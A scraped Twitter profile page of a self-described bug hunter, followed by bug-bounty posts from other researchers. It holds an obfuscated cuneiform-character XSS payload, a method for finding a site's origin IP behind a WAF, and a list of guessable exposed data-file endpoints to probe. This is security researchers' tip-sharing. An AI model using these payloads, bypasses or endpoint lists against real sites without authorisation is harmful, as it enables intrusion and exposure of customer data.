Nuy (@0xnuy) 's Twitter Profile
Nuy

@0xnuy

Life stored in my PC | Bug Hunter | Senior Cybersecurity | Red Teaming | Web Pentester | Digital forensics

ID: 1763965528975069184

calendar_today02-03-2024 16:32:36

157 Tweet

49 Followers

529 Following

Lütfü Mert Ceylan (@lutfumertceylan) 's Twitter Profile Photo

an XSS payload, Cuneiform-alphabet based 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() #bugbounty #bugbountytips #cybersecurity

an XSS payload, Cuneiform-alphabet based

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

#bugbounty #bugbountytips #cybersecurity
Deev Pal (@techycodec08) 's Twitter Profile Photo

After going through 200+ IDOR reports, and spending some time hunting for them in Real Targets across multiple functionalities, here are some of the attack methodologies I build for myself, which I feel can be useful to others too. Follow this thread to know more.

Ahmed Tarek (@0x_xnum) 's Twitter Profile Photo

Been studying Active Directory attacks lately and wrote some notes. Hope it helps someone out there ahmed-tarek.gitbook.io/0x_xnum/ad-pen #BugBounty #BugBountytip #bugcrowd #hackerone #pentesting

ZeUs.36 (@zeusvuln) 's Twitter Profile Photo

Wanna find the origin IP? 1-Hunt for a subdomain with no WAF 2-extract the ASN 2-check it on bgp.he.net 3- grab the IP range, and verify a live IP. Welcome to their world! #bugbountytips #BugBounty

Wanna find the origin IP? 
1-Hunt for a subdomain with no WAF
2-extract the ASN
2-check it on bgp.he.net
3- grab the IP range, and verify a live IP. 
Welcome to their world! 
#bugbountytips #BugBounty
VIEH Group (@viehgroup) 's Twitter Profile Photo

Wanna find the origin IP? 1-Hunt for a subdomain with no WAF 2-extract the ASN 2-check it on bgp.he.net 3- grab the IP range, and verify a live IP. Welcome to their world! #bugbountytips #BugBounty

Wanna find the origin IP? 
1-Hunt for a subdomain with no WAF
2-extract the ASN
2-check it on bgp.he.net
3- grab the IP range, and verify a live IP. 
Welcome to their world! 

#bugbountytips #BugBounty
zhero; (@zhero___) 's Twitter Profile Photo

just scored my biggest bounty to date, a nice $50,000 on Immunefi; huge shoutout to the mediation team; without them, the report would currently be in the vast graveyard of valid reports; they respect their researchers. and above all: هَٰذَا مِن فَضْلِ رَبِّي

just scored my biggest bounty to date, a nice $50,000 on <a href="/immunefi/">Immunefi</a>;

huge shoutout to the mediation team; without them, the report would currently be in the vast graveyard of valid reports; they respect their researchers.

and above all: هَٰذَا مِن فَضْلِ رَبِّي
‌Renwa (@renwax23) 's Twitter Profile Photo

Another month, another writing RCE vulnerability inside Opera browser by using a stored self-XSS on MyFlow (this is different from the previous rce which I published back in 2021) medium.com/@renwa/stored-…

Shatha511 (@ptshatha511) 's Twitter Profile Photo

شرحت لكم الـActive Directory من روم Active Directory Basics على TryHackMe اثناء محاولتي لتعلمه اذا تبغون نكمل ونسوي Part2 علموني مشاهدة ممتعة

Mohamed Elkhayat (@mohamed87khayat) 's Twitter Profile Photo

The endpoint was : /storage/users.csv Also try more endpoints like /storage/orders.csv /storage/transactions.csv /storage/reports.csv /storage/customers.csv /storage/backups/users_backup.csv /storage/tables/profiles.csv /storage/tables/roles.csv /storage/tables/invoices.csv

The endpoint was :
 /storage/users.csv

Also try more endpoints like

/storage/orders.csv
/storage/transactions.csv
/storage/reports.csv
/storage/customers.csv
/storage/backups/users_backup.csv
/storage/tables/profiles.csv
/storage/tables/roles.csv
/storage/tables/invoices.csv